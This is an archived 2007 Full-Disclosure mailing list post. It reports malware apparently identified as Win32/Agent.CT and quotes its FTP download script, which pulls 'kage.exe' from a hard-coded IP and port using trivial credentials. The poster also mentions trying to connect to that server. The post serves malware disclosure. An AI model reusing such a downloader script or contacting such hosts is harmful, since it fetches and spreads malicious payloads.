[Full-disclosure] Script from Win32/Agent.CT
- From: "FocusVirus" <virus@xxxxxxxx>
- Date: Thu, 11 Jan 2007 09:44:31 +1100
I attempted to download this but was dropped by the FTP server.
Host 61.36.242.10 is listening on port 5444 and appears to be hosting bot
update files.
Headers - 220 Serv-U FTP Server v5.0 for WinSock ready...
Script for filedownload is
open 61.36.242.10 5444
user 1 1
get kage . exe <----
quit
Was locked out on my first attempt, password was incorrect. Lock down your
connections now! :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: Re: [Full-disclosure] new class of printf issue: int overflow
- Next by Date: Re: [Full-disclosure] new class of printf issue: int overflow
- Previous by thread: [Full-disclosure] [ MDKSA-2007:009 ] - Updated kdenetwork packages fix ksirc vulnerability
- Next by thread: [Full-disclosure] Computer Terrorism (UK) :: Incident Response Centre - Microsoft Outlook Vulnerability
- Index(es):
Relevant Pages
|
